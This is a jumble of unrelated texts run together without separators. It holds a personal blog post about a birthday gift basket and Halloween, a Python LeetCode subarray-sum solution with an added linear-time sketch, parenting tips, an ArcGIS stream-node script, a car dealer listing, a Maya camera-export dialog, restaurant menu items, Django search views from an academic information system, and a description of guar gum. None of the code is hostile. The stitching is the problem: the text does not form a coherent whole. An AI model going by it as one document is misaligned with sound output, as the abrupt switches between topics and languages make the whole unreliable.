Dave's sister celebrated her 30th birthday yesterday! I put together a wine-themed gift basket. It included a few things I now covet for myself! Have you heard of the Woozie? The wine koozie! I got the wine gifties from Occasions in Norman, who usually carries my favorite winter candle, but they don't have it this year :(. Anyone know where I can get a Thymes Frasier Fir candle? I want my house to smell like Christmas NOW! And I realize my Wordless Wednesday post makes no sense - Dave needed a beard for his Halloween costume. The only one I could find was super long and happened to match my hair, so I decided to make myself into Cousin Itt before we trimmed it! We went as Alan from The Hangover and the tiger! Emily was at the same party as us! Then we left for the dental school Halloween party; best costume of the night was Kenny Powers! It's an inside joke, I guess? I didn't get it... We tailgated all day Saturday; kickoff wasn't until 8:15! It was a looooong weekend! So glad it cooled off for a game finally! Our antenna wasn't picking up the game so we headed to NY Pizza to finish watching it. Things got a little crazy! Sunday we were in full recovery mode! I decided breakfast for dinner was the best thing for us. Thanks again, Pioneer Woman! I made her Muffin Melts and they were super delicious! Your costumes are awesome! I would have never thought to do that! And I definitely need a Woozie! The food sounds awesome and tailgating with you guys and your friends has been so much fun!
#!/usr/bin/env python # encoding: utf-8 """ maximum-size-subarray-sum-equals-k.py Created by Shuailong on 2016-01-06. https://leetcode.com/problems/maximum-size-subarray-sum-equals-k/. """ '''Not solved yet.''' class Solution(object): def maxSubArrayLen(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ n = len(nums) sums = [0]*(n+1) for i in range(1, n+1): sums[i] = sums[i-1] + nums[i-1] res = 0 for i in range(n): for j in range(n-1,i-1+res,-1): if sums[j] - sums[i] == k and j - i > res: res = j - i return res class Solution2(object): '''TLE''' def maxSubArrayLen(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ n = len(nums) max_length = 0 for start_index in range(n): this_length = 0 subsum = 0 j = start_index while j < n: subsum += nums[j] if subsum == k: this_length = j - start_index + 1 j += 1 if this_length > max_length: max_length = this_length return max_length class Solution1(object): '''TLE''' def maxSubArrayLen(self, nums, k): """ :type nums: List[int] :type k: int :rtype: int """ n = len(nums) for length in range(n,0,-1): for start_index in range(n-length+1): subsum = 0 for i in range(length): subsum += nums[start_index+i] if subsum == k: return length return 0 def main(): solution = Solution() nums = [1, -1, 5, -2, 3] k = 3 print solution.maxSubArrayLen(nums,k) nums = [-2, -1, 2, 1] k = 1 print solution.maxSubArrayLen(nums,k) if __name__ == '__main__': main()
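All three classes above are quadratic or worse, hence the TLE notes. The standard linear-time answer records the first index at which each prefix sum occurs: a window (i, j] sums to k exactly when prefix[j] - prefix[i] == k, so each j only needs one hash lookup of prefix[j] - k. A sketch in Python 3 (the file itself is written for Python 2), checked against the file's own test cases:

def max_sub_array_len(nums, k):
    first_seen = {0: -1}          # prefix sum -> earliest index it occurs at
    prefix, best = 0, 0
    for j, x in enumerate(nums):
        prefix += x
        if prefix - k in first_seen:               # window (first_seen[prefix-k], j] sums to k
            best = max(best, j - first_seen[prefix - k])
        first_seen.setdefault(prefix, j)           # keep only the earliest occurrence
    return best

assert max_sub_array_len([1, -1, 5, -2, 3], 3) == 4
assert max_sub_array_len([-2, -1, 2, 1], 1) == 2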
Here are some tips and suggestions to consider as you send your teen off to college. Whether it's paint and markers from art class or grass stains from playing outside, stains destroy more school clothes than I like to think about. Once you begin to declutter your child's toys, you'll find that it's much easier for them to take care of them and keep their room neat. In the wake of the #MeToo movement, this is a good time to talk to your children about the meaning of sexual harassment, boundaries, and the ramifications of this behavior. Learn to give your children more responsibilities and insist that they participate in all of the tasks that happen around them.
######################################################################## # TTools # Step 1: Create Stream Nodes version 0.953 # Ryan Michie # This script will take an input polyline feature with unique # stream IDs and generate evenly spaced points along each # unique stream ID polyline at a user defined spacing measured from # the downstream endpoint. The script can also check the digitized # direction to determine the downstream end. # INPUTS # 0: Stream centerline polyline (streamline_fc) # 1: Unique StreamID field (sid_field) # 2: Spacing between nodes in meters (node_dx) # 3: Outputs a continuous stream km regardless of # unique the values in the stream ID field (cont_stream_km) # 3: OPTIONAL True/False flag to check if the stream was digitized in # correct direction (checkDirection) # 4: OPTIONAL Elevation Raster used in the check stream # direction procedure (z_raster) # 5: Path/Name of output node feature class (nodes_fc) # OUTPUTS # point feature class # The output point feature class has the following fields: # 0: NODE_ID - unique node ID # 1: STREAM_ID"- field matching a unique polyline ID field identifed # by the user, # 2: STREAM_KM - double measured from the downstream end of the stream # for each STREAM ID # 3: LONGITUDE - decimal degrees X coordinate of the node using GCS_WGS_1984 datum. # 4: LATITUDE - decimal degrees Y coordinate of the node using GCS_WGS_1984 datum. # 5. ASPECT - stream aspect in the direction of flow" # Future Updates # eliminate arcpy and use gdal for reading/writing feature class data # This version is for manual starts from within python. # This script requires Python 2.6 and ArcGIS 10.1 or higher to run. ######################################################################## # Import system modules from __future__ import division, print_function import sys import os import gc import time import traceback from datetime import timedelta from math import ceil, atan2, degrees from operator import itemgetter import arcpy from arcpy import env env.overwriteOutput = True # ---------------------------------------------------------------------- # Start Fill in Data streamline_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_streams_major" sid_field = "NAME" node_dx = 50 cont_stream_km = True checkDirection = True z_raster = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_be_m_mosaic" nodes_fc = r"D:\Projects\TTools_9\JohnsonCreek.gdb\jc_stream_nodes" # End Fill in Data # ---------------------------------------------------------------------- # Parameter fields for python toolbox #streamline_fc = parameters[0].valueAsText #sid_field = parameters[1].valueAsText #node_dx = parameters[2].valueAsText #cont_stream_km = parameters[3].valueAsText #checkDirection = parameters[4].valueAsText #z_raster = = parameters[5].valueAsText #nodes_fc = parameters[6].valueAsText #streamline_fc = arcpy.GetParameterAsText(0) #sid_field = arcpy.GetParameterAsText(1) #node_dx = arcpy.GetParameterAsText(2) #checkDirection = arcpy.GetParameterAsText(3) #z_raster = arcpy.GetParameterAsText(4) #nodes_fc = arcpy.GetParameterAsText(5) def create_node_list(streamline_fc, checkDirection, z_raster): """Reads an input stream centerline file and returns the NODE ID, STREAM ID, and X/Y coordinates as a list""" nodeList = [] incursorFields = ["SHAPE@","SHAPE@LENGTH", sid_field] nodeID = 0 # Determine input projection and spatial units proj = arcpy.Describe(streamline_fc).spatialReference con_from_m = from_meters_con(streamline_fc) con_to_m = to_meters_con(streamline_fc) # Pull the stream IDs into a 
list sid_list = [] with arcpy.da.SearchCursor(streamline_fc, sid_field,"",proj) as Inrows: for row in Inrows: sid_list.append(row[0]) # Check for duplicate stream IDs dups = list(set([i for i in sid_list if sid_list.count(i) > 1])) if dups: sys.exit("There are duplicate stream IDs in your input stream"+ "feature class."+ "\nHere are the duplicates: \n"+ "{0}".format(dups)) # Now create the nodes. I'm pulling the fc data twice because on # speed tests it is faster compared to saving all the incursorFields # to a list and iterating over the list print("Creating Nodes") with arcpy.da.SearchCursor(streamline_fc, incursorFields,"",proj) as Inrows: for row in Inrows: lineLength = row[1] # These units are in the units of projection numNodes = int(lineLength * con_to_m / node_dx) nodes = range(0,numNodes+1) mid = range(0,numNodes) if checkDirection is True: flip = check_stream_direction(row[0], z_raster, row[2]) else: flip = 1 arcpy.SetProgressor("step", "Creating Nodes", 0, numNodes+1, 1) # list of percentage of feature length to traverse positions = [n * node_dx * con_from_m / lineLength for n in nodes] segment_length = [node_dx] * numNodes + [lineLength * con_to_m % node_dx] mid_distance = node_dx * con_from_m / lineLength if mid_distance > 1: # this situation occurs when the stream < node_dx. # The azimith is calculated for the entire stream line. mid_distance = 1 i = 0 for position in positions: node = row[0].positionAlongLine(abs(flip - position), True).centroid # Get the coordinates at the up/down midway point along # the line between nodes and calculate the stream azimuth if position == 0.0: mid_up = row[0].positionAlongLine( abs(flip - (position + mid_distance)),True).centroid mid_down = node elif 0.0 < position + mid_distance < 1: mid_up = row[0].positionAlongLine( abs(flip - (position + mid_distance)),True).centroid mid_down = row[0].positionAlongLine( abs(flip - (position - mid_distance)),True).centroid else: mid_up = node mid_down = row[0].positionAlongLine( abs(flip - (position - mid_distance)),True).centroid stream_azimuth = degrees(atan2((mid_down.X - mid_up.X), (mid_down.Y - mid_up.Y))) if stream_azimuth < 0: stream_azimuth = stream_azimuth + 360 # list of "NODE_ID","STREAM_ID". 
"STREAM_KM", "LENGTH", # "POINT_X","POINT_Y", "ASPECT", "SHAPE@X", "SHAPE@Y" nodeList.append([nodeID, row[2], float(position * lineLength * con_to_m /1000), segment_length[i], node.X, node.Y, stream_azimuth, node.X, node.Y]) nodeID = nodeID + 1 i = i + 1 arcpy.SetProgressorPosition() arcpy.ResetProgressor() return(nodeList) def create_nodes_fc(nodeList, nodes_fc, sid_field, proj): """Create the output point feature class using the data from the nodes list""" #arcpy.AddMessage("Exporting Data") print("Exporting Data") # Determine Stream ID field properties sid_type = arcpy.ListFields(streamline_fc,sid_field)[0].type sid_precision = arcpy.ListFields(streamline_fc,sid_field)[0].precision sid_scale = arcpy.ListFields(streamline_fc,sid_field)[0].scale sid_length = arcpy.ListFields(streamline_fc,sid_field)[0].length #Create an empty output with the same projection as the input polyline cursorfields = ["NODE_ID", "STREAM_ID", "STREAM_KM", "LENGTH", "LONGITUDE", "LATITUDE", "ASPECT"] arcpy.CreateFeatureclass_management(os.path.dirname(nodes_fc), os.path.basename(nodes_fc), "POINT","","DISABLED","DISABLED",proj) # Add attribute fields for f in cursorfields: if f == "STREAM_ID": arcpy.AddField_management(nodes_fc, f, sid_type, sid_precision, sid_scale, sid_length, "", "NULLABLE", "NON_REQUIRED") else: arcpy.AddField_management(nodes_fc, f, "DOUBLE", "", "", "", "", "NULLABLE", "NON_REQUIRED") with arcpy.da.InsertCursor(nodes_fc, cursorfields + ["SHAPE@X","SHAPE@Y"]) as cursor: for row in nodeList: cursor.insertRow(row) #Change X/Y from input spatial units to decimal degrees proj_dd = arcpy.SpatialReference(4326) # GCS_WGS_1984 with arcpy.da.UpdateCursor(nodes_fc,["SHAPE@X","SHAPE@Y","LONGITUDE", "LATITUDE"],"",proj_dd) as cursor: for row in cursor: row[2] = row[0] # LONGITUDE row[3] = row[1] # LATITUDE cursor.updateRow(row) def check_stream_direction(stream, z_raster, streamID): """Samples the elevation raster at both ends of the stream polyline to see which is the downstream end and returns flip = 1 if the stream km need to be reversed""" down = stream.positionAlongLine(0,True).centroid up = stream.positionAlongLine(1,True).centroid # when a single raster cell is sampled it is a little faster to # use arcpy compared to converting to an array and then sampling. # I left the code just in case though z_down = float(arcpy.GetCellValue_management (z_raster, str(down.X)+ " "+ str(down.Y),1).getOutput(0)) z_up = float(arcpy.GetCellValue_management (z_raster, str(up.X) + " "+ str(up.Y),1).getOutput(0)) #z_down = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(down.X, down.Y), 1, 1, -9999)[0][0] #z_up = arcpy.RasterToNumPyArray(z_raster, arcpy.Point(up.X, up.Y), 1, 1, -9999)[0][0] if z_down <= z_up or z_down == -9999 or z_up == -9999: # do not reverse stream km flip = 0 else: print("Reversing {0}".format(streamID)) # reversed stream km flip = 1 return flip def to_meters_con(inFeature): """Returns the conversion factor to get from the input spatial units to meters""" try: con_to_m = arcpy.Describe(inFeature).SpatialReference.metersPerUnit except: arcpy.AddError("{0} has a coordinate system ".format(inFeature)+ "that is not projected or not recognized. "+ "Use a projected coordinate system " "preferably in linear units of feet or meters.") sys.exit("Coordinate system is not projected or not recognized. 
"+ "Use a projected coordinate system, preferably in linear "+ "units of feet or meters.") return con_to_m def from_meters_con(inFeature): """Returns the conversion factor to get from meters to the spatial units of the input feature class""" try: con_from_m = 1 / arcpy.Describe(inFeature).SpatialReference.metersPerUnit except: arcpy.AddError("{0} has a coordinate system ".format(inFeature)+ "that is not projected or not recognized. "+ "Use a projected coordinate system " "preferably in linear units of feet or meters.") sys.exit("Coordinate system is not projected or not recognized. "+ "Use a projected coordinate system, preferably in linear "+ "units of feet or meters.") return con_from_m #enable garbage collection gc.enable() try: #keeping track of time startTime= time.time() # Check if the output exists if arcpy.Exists(nodes_fc): arcpy.AddError("\nThis output already exists: \n" + "{0}\n".format(nodes_fc) + "Please rename your output.") sys.exit("This output already exists: \n" + "{0}\n".format(nodes_fc) + "Please rename your output.") # Get the spatial projecton of the input stream lines proj = arcpy.Describe(streamline_fc).SpatialReference if checkDirection is True: proj_ele = arcpy.Describe(z_raster).spatialReference # Check to make sure the elevatiohn raster and input # streams are in the same projection. if proj.name != proj_ele.name: arcpy.AddError("{0} and {1} do not ".format(nodes_fc,z_raster)+ "have the same projection."+ "Please reproject your data.") sys.exit("Input stream line and elevation raster do not have " "the same projection. Please reproject your data.") # Create the stream nodes and return them as a list nodeList = create_node_list(streamline_fc, checkDirection, z_raster) if cont_stream_km: #sort the list by stream ID and stream km nodeList = sorted(nodeList, key=itemgetter(1, 2)) skm = 0.0 for i in range(0, len(nodeList)): nodeList[i][2] = skm skm = skm + (node_dx * 0.001) # re sort the list by stream km (with downstream end at the top) nodeList = sorted(nodeList, key=itemgetter(2), reverse=True) else: #sort the list by stream ID and then stream km (downstream end at the top) nodeList = sorted(nodeList, key=itemgetter(1,2), reverse=True) # Create the output node feature class with the nodes list create_nodes_fc(nodeList, nodes_fc, sid_field, proj) gc.collect() endTime = time.time() elapsedmin = ceil(((endTime - startTime) / 60)* 10)/10 mspernode = timedelta(seconds=(endTime - startTime) / len(nodeList)).microseconds print("Process Complete in {0} minutes. {1} microseconds per node".format(elapsedmin, mspernode)) #arcpy.AddMessage("Process Complete in %s minutes. %s microseconds per node" % (elapsedmin, mspernode)) # For arctool errors except arcpy.ExecuteError: msgs = arcpy.GetMessages(2) #arcpy.AddError(msgs) print(msgs) # For other errors except: tbinfo = traceback.format_exc() pymsg = "PYTHON ERRORS:\n" + tbinfo + "\nError Info:\n" +str(sys.exc_info()[1]) msgs = "ArcPy ERRORS:\n" + arcpy.GetMessages(2) + "\n" #arcpy.AddError(pymsg) #arcpy.AddError(msgs) print(pymsg) print(msgs)
This Vehicle is equipped with: 17" x 7.5" Aluminum Alloy Wheels, 4-Wheel Disc Brakes, 6 Speakers, ABS brakes, Air Conditioning, AM/FM radio: SiriusXM, Anti-whiplash front head restraints, Auto-dimming Rear-View mirror, Automatic temperature control, Brake assist, Bumpers: body-color, CD player, Delay-off headlights, Driver door bin, Driver vanity mirror, Dual front impact airbags, Dual front side impact airbags, Electronic Stability Control, Four wheel independent suspension, Front anti-roll bar, Front Bucket Seats, Front Center Armrest, Front dual zone A/C, Front fog lights, Front reading lights, Fully automatic headlights, Heated door mirrors, Illuminated entry, Leather Shift Knob, Leather steering wheel, Leatherette Seating Surfaces, Literature Kit, Low tire pressure warning, Occupant sensing airbag, Outside temperature display, Overhead airbag, Overhead console, Panic alarm, Passenger door bin, Passenger vanity mirror, Power door mirrors, Power driver seat, Power passenger seat, Power steering, Power windows, Radio data system, Radio: AM/FM/HD/CD w/MP3 Playback Capability, Rain sensing wipers, Rear anti-roll bar, Rear reading lights, Rear seat center armrest, Rear window defroster, Remote keyless entry, Security system, Speed control, Speed-sensing steering, Speed-Sensitive Wipers, Steering wheel mounted audio controls, Tachometer, Telescoping steering wheel, Tilt steering wheel, Traction control, Trip computer, Turn signal indicator mirrors, and Variably intermittent wipers. Grubbs Family of Dealerships offers this 2019 INFINITI Q50 for sale. This Pure White INFINITI Q50 2.0t PURE RWD features a 208-hp 2.0-liter I4 turbo engine and Automatic transmission to power your excursions through Dallas and Fort Worth. Test drive this 2019 Q50 at one of Grubbs' dealership locations. To schedule your test drive, or to inquire about financing this new INFINITI model in the DFW, contact Grubbs, your trusted automotive dealerships in Texas and Massachusetts.
from __future__ import absolute_import from uitools.qt import QtCore, QtGui, Qt from maya import cmds, mel import sgpublish.exporter.ui.publish.maya import sgpublish.exporter.ui.tabwidget import sgpublish.exporter.ui.workarea import sgpublish.uiutils from sgpublish.exporter.ui.publish.generic import PublishSafetyError from .exporter import CameraExporter, get_nodes_to_export class Dialog(QtGui.QDialog): def __init__(self): super(Dialog, self).__init__() self._setup_ui() def _setup_ui(self): self.setWindowTitle("Camera Export") self.setLayout(QtGui.QVBoxLayout()) self.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed) camera_row = QtGui.QHBoxLayout() camera_row.setSpacing(2) self.layout().addLayout(camera_row) self._cameras = QtGui.QComboBox() camera_row.addWidget(self._cameras) self._cameras.activated.connect(self._on_cameras_changed) button = QtGui.QPushButton("Reload") button.clicked.connect(self._on_reload) button.setFixedHeight(self._cameras.sizeHint().height()) button.setFixedWidth(button.sizeHint().width()) camera_row.addWidget(button) box = QtGui.QGroupBox("Manifest Summary") self.layout().addWidget(box) box.setLayout(QtGui.QVBoxLayout()) self._summary = QtGui.QLabel("Select a camera.") box.layout().addWidget(self._summary) box.setSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Fixed) box = QtGui.QGroupBox("Options") self.layout().addWidget(box) box.setLayout(QtGui.QVBoxLayout()) self._worldSpaceBox = QtGui.QCheckBox("Bake to World Space (for debugging)") box.layout().addWidget(self._worldSpaceBox) self._exporter = CameraExporter() self._exporter_widget = sgpublish.exporter.ui.tabwidget.Widget() self.layout().addWidget(self._exporter_widget) # SGPublishes. tab = sgpublish.exporter.ui.publish.maya.Widget(self._exporter) tab.beforeScreenshot.connect(lambda *args: self.hide()) tab.afterScreenshot.connect(lambda *args: self.show()) self._exporter_widget.addTab(tab, "Publish to Shotgun") # Work area. tab = sgpublish.exporter.ui.workarea.Widget(self._exporter, { 'directory': 'scenes/camera', 'sub_directory': '', 'extension': '.ma', 'warning': self._warning, 'error': self._warning, }) self._exporter_widget.addTab(tab, "Export to Work Area") button_row = QtGui.QHBoxLayout() button_row.addStretch() self.layout().addLayout(button_row) self._button = button = QtGui.QPushButton("Export") button.clicked.connect(self._on_export) button_row.addWidget(button) self._populate_cameras() def _on_reload(self, *args): self._populate_cameras() def _populate_cameras(self): previous = str(self._cameras.currentText()) selection = set(cmds.ls(sl=True, type='transform') or ()) self._cameras.clear() for camera in cmds.ls(type="camera"): transform = cmds.listRelatives(camera, parent=True, fullPath=True)[0] self._cameras.addItem(transform, (transform, camera)) if (previous and previous == transform) or (not previous and transform in selection): self._cameras.setCurrentIndex(self._cameras.count() - 1) self._update_status() def _on_cameras_changed(self, *args): self._update_status() def _update_status(self): transform = str(self._cameras.currentText()) counts = {} for node in get_nodes_to_export(transform): type_ = cmds.nodeType(node) counts[type_] = counts.get(type_, 0) + 1 self._summary.setText('\n'.join('%dx %s' % (c, n) for n, c in sorted(counts.iteritems()))) def _on_export(self, *args): # Other tools don't like cameras named the same as their transform, # so this is a good place to warn about it. 
transform, camera = self._cameras.itemData(self._cameras.currentIndex()).toPyObject() transform_name = transform.rsplit('|', 1)[-1] camera_name = camera.rsplit('|', 1)[-1] if transform_name == camera_name: res = QtGui.QMessageBox.warning(self, "Camera Name Collision", "The selected camera and its transform have the same name, " "which can cause issues with other tools.\n\nContinue anyways?", "Abort", "Continue") if not res: return try: publisher = self._exporter_widget.export( camera=camera, bake_to_world_space=self._worldSpaceBox.isChecked() ) except PublishSafetyError: return if publisher: sgpublish.uiutils.announce_publish_success(publisher) self.close() def _warning(self, message): cmds.warning(message) def _error(self, message): cmds.confirmDialog(title='Scene Name Error', message=message, icon='critical') cmds.error(message) def __before_reload__(): if dialog: dialog.close() dialog = None def run(): global dialog if dialog: dialog.close() # Be cautious if the scene was never saved filename = cmds.file(query=True, sceneName=True) if not filename: res = QtGui.QMessageBox.warning(None, 'Unsaved Scene', 'This scene has not beed saved. Continue anyways?', QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No ) if res & QtGui.QMessageBox.No: return workspace = cmds.workspace(q=True, rootDirectory=True) if filename and not filename.startswith(workspace): res = QtGui.QMessageBox.warning(None, 'Mismatched Workspace', 'This scene is not from the current workspace. Continue anyways?', QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No ) if res & QtGui.QMessageBox.No: return dialog = Dialog() dialog.show()
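The name-collision warning in _on_export exists because a camera shape named identically to its transform trips up other tools. A standalone sketch of that same check with maya.cmds (the helper name is mine, and it assumes it runs inside a Maya session):

from maya import cmds

def camera_name_collisions():
    """Return (transform, shape) pairs whose short names match."""
    clashes = []
    for shape in cmds.ls(type='camera') or []:
        transform = cmds.listRelatives(shape, parent=True, fullPath=True)[0]
        # Compare short names only; full paths always differ.
        if transform.rsplit('|', 1)[-1] == shape.rsplit('|', 1)[-1]:
            clashes.append((transform, shape))
    return clashes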
Loaded with bacon & cheese. Served with a side of ranch. Served with mushrooms & onions. 5 large shrimp lightly breaded, seasoned & fried, served on a skewer with choice of cocktail or sweet Thai chili sauce. 6 large shrimp served with cocktail sauce. 2 crab cakes topped with greens & drizzled with seafood sauce, served on a Hawaiian bun. Hand-breaded strips of calamari pair well with our freshly made cocktail sauce or perfectly with our sweet Thai chili sauce.
############################################################################## # # OSIS stands for Open Student Information System. It's an application # designed to manage the core business of higher education institutions, # such as universities, faculties, institutes and professional schools. # The core business involves the administration of students, teachers, # courses, programs and so on. # # Copyright (C) 2015-2021 Université catholique de Louvain (http://www.uclouvain.be) # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # A copy of this license - GNU General Public License - is available # at the root of the source code of this program. If not, # see http://www.gnu.org/licenses/. # ############################################################################## import itertools from collections import OrderedDict from dal import autocomplete from django.contrib import messages from django.contrib.auth.mixins import LoginRequiredMixin, PermissionRequiredMixin from django.shortcuts import get_object_or_404 from django.utils.html import format_html from django.utils.translation import gettext_lazy as _, get_language from django_filters.views import FilterView from base.business.education_group import ORDER_COL, ORDER_DIRECTION, create_xls_administrative_data from program_management.business.xls_customized import create_customized_xls, TRAINING_LIST_CUSTOMIZABLE_PARAMETERS from base.forms.search.search_form import get_research_criteria from base.models.academic_year import starting_academic_year from base.models.education_group_type import EducationGroupType from base.models.enums import education_group_categories from base.models.person import Person from base.utils.cache import CacheFilterMixin from base.utils.search import SearchMixin, RenderToExcel from education_group.models.group_year import GroupYear from program_management.api.serializers.education_group import EducationGroupSerializer from program_management.forms.education_groups import GroupFilter def _get_filter(form): return OrderedDict(itertools.chain(get_research_criteria(form))) def _create_xls_administrative_data(view_obj, context, **response_kwargs): user = view_obj.request.user egys = context["filter"].qs filters = _get_filter(context["form"]) # FIXME: use ordering args in filter_form! Remove xls_order_col/xls_order property order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'), ORDER_DIRECTION: view_obj.request.GET.get('xls_order')} return create_xls_administrative_data(user, egys, filters, order, get_language()) def _create_xls_customized(view_obj, context, **response_kwargs): user = view_obj.request.user egys = context["filter"].qs filters = _get_filter(context["form"]) # FIXME: use ordering args in filter_form! 
Remove xls_order_col/xls_order property order = {ORDER_COL: view_obj.request.GET.get('xls_order_col'), ORDER_DIRECTION: view_obj.request.GET.get('xls_order')} return create_customized_xls(user, egys, filters, order, _get_xls_parameters(view_obj)) def _get_xls_parameters(view_obj): other_params = [] for parameter in TRAINING_LIST_CUSTOMIZABLE_PARAMETERS: if view_obj.request.GET.get(parameter) == 'true': other_params.append(parameter) return other_params @RenderToExcel("xls_administrative", _create_xls_administrative_data) @RenderToExcel("xls_customized", _create_xls_customized) class EducationGroupSearch(LoginRequiredMixin, PermissionRequiredMixin, CacheFilterMixin, SearchMixin, FilterView): model = GroupYear template_name = "search.html" raise_exception = False filterset_class = GroupFilter permission_required = 'base.view_educationgroup' serializer_class = EducationGroupSerializer cache_search = True cache_exclude_params = ['xls_status'] def get_context_data(self, **kwargs): person = get_object_or_404(Person, user=self.request.user) context = super().get_context_data(**kwargs) starting_ac = starting_academic_year() if context["paginator"].count == 0 and self.request.GET: messages.add_message(self.request, messages.WARNING, _('No result!')) context.update({ 'person': person, 'form': context["filter"].form, 'object_list_count': context["paginator"].count, 'current_academic_year': starting_ac, 'items_per_page': context["paginator"].per_page, 'enums': education_group_categories, }) return context class EducationGroupTypeAutoComplete(LoginRequiredMixin, autocomplete.Select2QuerySetView): def get_queryset(self): if not self.request.user.is_authenticated: return EducationGroupType.objects.none() qs = EducationGroupType.objects.all() category = self.forwarded.get('category', None) if category: qs = qs.filter(category=category) if self.q: # Filtering must be done in python because translated value. ids_to_keep = {result.pk for result in qs if self.q.lower() in result.get_name_display().lower()} qs = qs.filter(id__in=ids_to_keep) qs = qs.order_by_translated_name() return qs def get_result_label(self, result): return format_html('{}', result.get_name_display())
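EducationGroupTypeAutoComplete filters in Python rather than SQL because get_name_display() is translated at runtime, so the match cannot be pushed into the database. The same pattern as a generic hedged sketch (model-agnostic names, not the OSIS ones):

def filter_by_translated_display(qs, query, display_attr='get_name_display'):
    """Keep only rows whose translated display value contains the query.

    Runs in Python because the translation happens outside the database;
    acceptable for small choice tables like type lists.
    """
    needle = query.lower()
    ids_to_keep = {obj.pk for obj in qs
                   if needle in getattr(obj, display_attr)().lower()}
    return qs.filter(id__in=ids_to_keep)

# usage inside a get_queryset(): qs = filter_by_translated_display(qs, self.q)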
Guar Gum is primarily the ground endosperm of guar beans. The guar seeds are dehusked, milled and screened to obtain guar gum, which is typically produced as a free-flowing, off-white powder. Guar Gum is used in the textile industry for sizing, finishing and printing, as well as in the paper, explosives, pharmaceutical, cosmetics, hydraulic fracturing, mining, hydroseeding, fire retardant, and nanoparticle industries. In the food industry it is used primarily in gluten-free products; in dairy products it serves as a thickener, and in condiments it improves stability. Interesting fact - Guar Gum can be used as a bulk-forming laxative for bowel ailments such as diverticulosis, Crohn's disease, colitis and irritable bowel syndrome.